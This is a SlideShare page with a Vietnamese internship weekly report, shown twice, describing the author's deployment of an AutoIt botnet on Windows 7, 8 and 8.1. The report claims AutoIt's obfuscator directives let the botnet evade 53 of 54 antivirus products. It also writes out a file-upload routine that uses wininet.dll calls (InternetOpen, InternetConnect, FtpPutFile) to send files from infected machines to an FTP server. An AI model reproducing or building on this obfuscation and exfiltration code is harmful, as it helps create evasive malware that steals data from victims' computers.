SlideShare a Scribd company logo
1 of 2
BÁO CÁO TUẦN 1
Trong tuần rồi em đã thực hiện triển khai mạng botnet bằng ngôn ngữ Autoit trên
các máy tính chạy windows 7 (tất cả các phiên bản) , windows 8 , windows 8.1 .
Kết quả :
- Đối với windows 7 và 8 : botnet chạy ổn định , nhưng vớicác máy bị lây
nhiễm mà user (của máy bị nhiễm) không có quyền ghi file (copy , write … )
trên ổ C: thì botnet không có tác dụng
- Đối với windows 8.1 : botnet không có khả năng chạy ổn định
Em đã dùng các hàm sẵn có của Autoit để làm rối code , kết quả sau khi làm rối thì
đã bypass 53/54 trình AntiVirus , còn 1 trình AntiVirus chưa bypass được là CMC
của Việt Nam . Đoạn code làm rốiđược đặt ở đầu và cuối của phần code của
botnet :
#AutoIt3Wrapper_Run_Obfuscator =y
#Obfuscator_Ignore_Variables =
#Obfuscator_Ignore_Funcs =
#Obfuscator_On
[phần code của botnet]
#Obfuscator_Off
Riêng phần code upload file em xây dựng như sau :
-Load thư viện wininet.dll để mở dịch vụ FTP
DllCall('wininet.dll', 'long', 'InternetOpen', 'str', $s_Agent, 'long',
$l_AccessType, 'str', $s_ProxyName, 'str', $s_ProxyBypass, 'long', $l_Flags)
-Cũng load thư viện wininet.dll để kết nối vào FTP
DllCall('wininet.dll', 'long', 'InternetConnect', 'long', $l_InternetSession, 'str',
$s_ServerName, 'int', $i_ServerPort, 'str', $s_Username, 'str', $s_Password,
'long', $l_Service, 'long', $l_Flags, 'long', $l_Context)
-Tiếp theo là upload file lên FTP
DllCall('wininet.dll', 'int', 'FtpPutFile', 'long', $l_FTPSession, 'str',
$s_LocalFile, 'str', $s_RemoteFile, 'long', $l_Flags, 'long', $l_Context)
-Và cuối cùng là đóng FTP lại
DllCall('wininet.dll', 'int', 'InternetCloseHandle', 'long', $l_InternetSession)

More Related Content

Similar to Hoangxuannhathuy lopthuctap cntt-daihocbachkhoa

Một vài thủ thuật trong window 8
Một vài thủ thuật trong window 8Một vài thủ thuật trong window 8
Một vài thủ thuật trong window 8
pl Chau
 
Usb may coi truong
Usb may coi truongUsb may coi truong
Usb may coi truong
Nguyen Trung
 
Giáo trình java Đại Học Sư Phạm Kỹ Thuật Hưng Yên
Giáo trình java Đại Học Sư Phạm Kỹ Thuật Hưng YênGiáo trình java Đại Học Sư Phạm Kỹ Thuật Hưng Yên
Giáo trình java Đại Học Sư Phạm Kỹ Thuật Hưng Yên
Trần Thiên Đại
 
Kỹ thuật lập trình Gadget
Kỹ thuật lập trình GadgetKỹ thuật lập trình Gadget
Kỹ thuật lập trình Gadget
hanoipost
 
Chuong 1 tongquan
Chuong 1 tongquanChuong 1 tongquan
Chuong 1 tongquan
VNG
 
Tìm hiểu về microsoft expression encoder 4
Tìm hiểu về microsoft expression encoder 4Tìm hiểu về microsoft expression encoder 4
Tìm hiểu về microsoft expression encoder 4
Đăng Khôi
 
Chuong vb.net
Chuong vb.netChuong vb.net
Chuong vb.net
kienbom
 

Similar to Hoangxuannhathuy lopthuctap cntt-daihocbachkhoa (20)

Bai giangvb.net
Bai giangvb.netBai giangvb.net
Bai giangvb.net
 
Bai giangvb.net
Bai giangvb.netBai giangvb.net
Bai giangvb.net
 
Một vài thủ thuật trong window 8
Một vài thủ thuật trong window 8Một vài thủ thuật trong window 8
Một vài thủ thuật trong window 8
 
Bảng so sánh các tool công cụ (1)
Bảng so sánh các tool công cụ (1)Bảng so sánh các tool công cụ (1)
Bảng so sánh các tool công cụ (1)
 
Usb may coi truong
Usb may coi truongUsb may coi truong
Usb may coi truong
 
Hướng dẫn làm quen với stm8 f103 - tincanban.com
Hướng dẫn làm quen với stm8 f103 - tincanban.comHướng dẫn làm quen với stm8 f103 - tincanban.com
Hướng dẫn làm quen với stm8 f103 - tincanban.com
 
Giáo trình java Đại Học Sư Phạm Kỹ Thuật Hưng Yên
Giáo trình java Đại Học Sư Phạm Kỹ Thuật Hưng YênGiáo trình java Đại Học Sư Phạm Kỹ Thuật Hưng Yên
Giáo trình java Đại Học Sư Phạm Kỹ Thuật Hưng Yên
 
Tai lieu ve phan cung
Tai lieu ve phan cungTai lieu ve phan cung
Tai lieu ve phan cung
 
Tai lieu ve phan cung
Tai lieu ve phan cungTai lieu ve phan cung
Tai lieu ve phan cung
 
Chuong 1 tongquan
Chuong 1 tongquanChuong 1 tongquan
Chuong 1 tongquan
 
Kỹ thuật lập trình Gadget
Kỹ thuật lập trình GadgetKỹ thuật lập trình Gadget
Kỹ thuật lập trình Gadget
 
Chuong 1 tongquan
Chuong 1 tongquanChuong 1 tongquan
Chuong 1 tongquan
 
Chuong 1 tongquan
Chuong 1 tongquanChuong 1 tongquan
Chuong 1 tongquan
 
Huong dan xu ly cac loi khi su dung phan mem reset may in
Huong dan xu ly cac loi khi su dung phan mem reset may inHuong dan xu ly cac loi khi su dung phan mem reset may in
Huong dan xu ly cac loi khi su dung phan mem reset may in
 
Cac bai tap .net
Cac bai tap .netCac bai tap .net
Cac bai tap .net
 
Tìm hiểu về microsoft expression encoder 4
Tìm hiểu về microsoft expression encoder 4Tìm hiểu về microsoft expression encoder 4
Tìm hiểu về microsoft expression encoder 4
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Cách tối ưu hóa môi trường lập trình ứng dụng cho Android - Tăng tốc máy ảo A...
Cách tối ưu hóa môi trường lập trình ứng dụng cho Android - Tăng tốc máy ảo A...Cách tối ưu hóa môi trường lập trình ứng dụng cho Android - Tăng tốc máy ảo A...
Cách tối ưu hóa môi trường lập trình ứng dụng cho Android - Tăng tốc máy ảo A...
 
Gt java080102005
Gt java080102005Gt java080102005
Gt java080102005
 
Chuong vb.net
Chuong vb.netChuong vb.net
Chuong vb.net
 

More from Daewoo Han (6)

Quiz3 tonghop
 Quiz3 tonghop Quiz3 tonghop
Quiz3 tonghop
 
Quiz1 tonghop
 Quiz1 tonghop Quiz1 tonghop
Quiz1 tonghop
 
Đồ án cuối kì
Đồ án cuối kìĐồ án cuối kì
Đồ án cuối kì
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 

Hoangxuannhathuy lopthuctap cntt-daihocbachkhoa

  • 1. BÁO CÁO TUẦN 1 Trong tuần rồi em đã thực hiện triển khai mạng botnet bằng ngôn ngữ Autoit trên các máy tính chạy windows 7 (tất cả các phiên bản) , windows 8 , windows 8.1 . Kết quả : - Đối với windows 7 và 8 : botnet chạy ổn định , nhưng vớicác máy bị lây nhiễm mà user (của máy bị nhiễm) không có quyền ghi file (copy , write … ) trên ổ C: thì botnet không có tác dụng - Đối với windows 8.1 : botnet không có khả năng chạy ổn định Em đã dùng các hàm sẵn có của Autoit để làm rối code , kết quả sau khi làm rối thì đã bypass 53/54 trình AntiVirus , còn 1 trình AntiVirus chưa bypass được là CMC của Việt Nam . Đoạn code làm rốiđược đặt ở đầu và cuối của phần code của botnet : #AutoIt3Wrapper_Run_Obfuscator =y #Obfuscator_Ignore_Variables = #Obfuscator_Ignore_Funcs = #Obfuscator_On [phần code của botnet] #Obfuscator_Off Riêng phần code upload file em xây dựng như sau : -Load thư viện wininet.dll để mở dịch vụ FTP DllCall('wininet.dll', 'long', 'InternetOpen', 'str', $s_Agent, 'long', $l_AccessType, 'str', $s_ProxyName, 'str', $s_ProxyBypass, 'long', $l_Flags) -Cũng load thư viện wininet.dll để kết nối vào FTP
  • 2. DllCall('wininet.dll', 'long', 'InternetConnect', 'long', $l_InternetSession, 'str', $s_ServerName, 'int', $i_ServerPort, 'str', $s_Username, 'str', $s_Password, 'long', $l_Service, 'long', $l_Flags, 'long', $l_Context) -Tiếp theo là upload file lên FTP DllCall('wininet.dll', 'int', 'FtpPutFile', 'long', $l_FTPSession, 'str', $s_LocalFile, 'str', $s_RemoteFile, 'long', $l_Flags, 'long', $l_Context) -Và cuối cùng là đóng FTP lại DllCall('wininet.dll', 'int', 'InternetCloseHandle', 'long', $l_InternetSession)